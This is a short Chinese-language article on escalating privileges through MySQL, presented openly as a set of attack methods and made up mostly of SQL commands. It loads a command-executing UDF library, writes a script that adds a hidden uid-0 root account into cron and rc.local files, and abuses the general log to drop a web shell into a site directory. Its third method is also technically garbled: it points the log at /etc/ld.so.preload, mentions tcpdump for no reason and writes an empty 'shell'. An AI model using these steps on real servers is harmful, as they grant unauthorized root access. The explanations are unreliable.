MySQL數據庫是一款常用的開源關系型數據庫管理系統，廣泛應用于各個領域。在使用MySQL時，可能會遇到需要提權的情況，讓我們來了解一下MySQL數據庫提權的幾種手法。

1. 利用UDF提權

mysql >CREATE FUNCTION do_system RETURNS INT SONAME 'lib_mysqludf_sys.so';
mysql >select do_system('id >/tmp/outfile');

這種方法需要加載MySQL UDF (User Defined Function)的庫，UDF類似于MySQL的存儲過程，可以讓用戶實現自己的SQL函數。如果黑客成功上傳經過修改的UDF程序，則可以通過執行該函數獲得提權的權限。

2. 利用MySQL擁有的系統命令提權

mysql >create table lxytmp(filepath char(100) );
mysql >insert into lxytmp(filepath) values('/usr/sbin/useradd -o -u 0 -g 0 -m -s /bin/bash test');
mysql >select * from lxytmp into outfile '/etc/cron.hourly/lxy.sh';
mysql >create table lxy(filepath char(100));
mysql >insert into lxy(filepath) values('/etc/cron.hourly/lxy.sh');
mysql >select * from  lxy into outfile '/etc/rc.d/rc.local'; 
mysql >select * from lxy into dumpfile '/etc/rc.d/rc.local';

這種方法需要通過MySQL的文件導入功能將Linux系統命令注入到指定的系統文件中，實現提權效果。

3. 利用MySQL提供的系統變量提權

mysql >set global general_log_file='/etc/ld.so.preload';
mysql >set global general_log = on;
mysql >select "" into outfile '/usr/local/apache2/htdocs/shell.php';
mysql >set global general_log = off;
mysql >set global general_log_file='/var/log/mysql/mysql.log';

這種方法先改變MySQL的系統變量，將進程的文件輸出流(tcpdump)寫到預設的文件中，通過代碼執行"system()"函數將shell注入到指定的網站目錄中，從而實現提權效果。

總之，MySQL數據庫提權的方法有很多，需要我們提高安全意識，加強防范措施，避免漏洞被利用。